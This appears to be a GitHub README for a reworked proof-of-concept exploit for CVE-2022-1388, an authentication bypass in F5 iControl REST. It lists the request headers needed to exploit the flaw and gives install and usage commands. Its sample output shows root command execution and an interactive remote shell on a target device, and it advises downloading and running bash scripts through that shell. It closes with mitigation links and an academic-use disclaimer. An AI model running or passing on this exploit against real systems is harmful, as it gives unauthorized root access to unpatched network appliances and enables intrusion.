Improved POC for CVE-2022-1388 that affects multiple F5 products.
This is an improved version of Horizon3's Proof of Concept for CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388
Also it's a complete rework with refactoring for PsychoSec work by https://github.com/PsychoSec2/CVE-2022-1388-POC
LOL this guy mentioned in the Requirements section such point as brains and has a +40% of duplicated and absolutely not scalable code.
Session block was also deleted as I don't see many sense in it here.
This version contains multiple improvements as well as an interactive shell to run remote commands.
Horizon3's technical root cause analysis of the vulnerability can be found on their blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Necessary conditions of a request for exploiting this vulnerability:
Connection header must include X-F5-Auth-Token
X-F5-Auth-Token header must be present
Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
Auth header must be set with the admin username and any password
git
pip3
python3
git clone https://github.com/iveresk/cve-2022-1388-iveresk-command-shell.git
cd cve-2022-1388-iveresk-command-shell
pip3 install -r requirements.txt
python3 cve-2022-1388-1veresk.py -h
Testing a Target:
python3 cve-2022-1388-1veresk.py.py -u -t https://192.168.0.221
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!
Use -s option to run an interactive shell. Interactive Shell:
python3 cve-2022-1388-1veresk.py -u -s https://192.168.0.221
Running interactive shell..
root@f5-localhost: /var/service/restjavad$
Dose not require the use of any reverse tcp connection or listeners.
Use 'exit' command to exit the shell...
Please note that while running the interactive shell on an unpatched system, certain commands and syntax's might not work or give you an expected result. This is probably due to the use of JSON in server API requests and resposes. To avoid any issues try not use characters that are common to JSON syntax such as double quotes, colons, commas, curly braces, and brackets when using the interactive shell. Any JSON syntax should be in structured format.
Using any sort of unstructured JSON syntax within a command might lead to a malformed API request to the server and could leave you with: no command output, nothing being executed, or it could throw you out of the python script entirely. This dose unfortunately render some commands un-useable. To get around this issue you can instead write a bash script, download it to the server, and exectute it using the interactive shell. It is also not possible to change directories using the 'cd' command.
In any case you should still be able to get basic command output nontheless. If you get no command output, it dose not mean that the command wasn't executed. However, you would have to figure that out using your own analysis.
Update to the latest version or mitigate by following the instructions within the F5 Security Advisory
https://support.f5.com/csp/article/K23605346
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
You are free to contact me via Keybase for any details.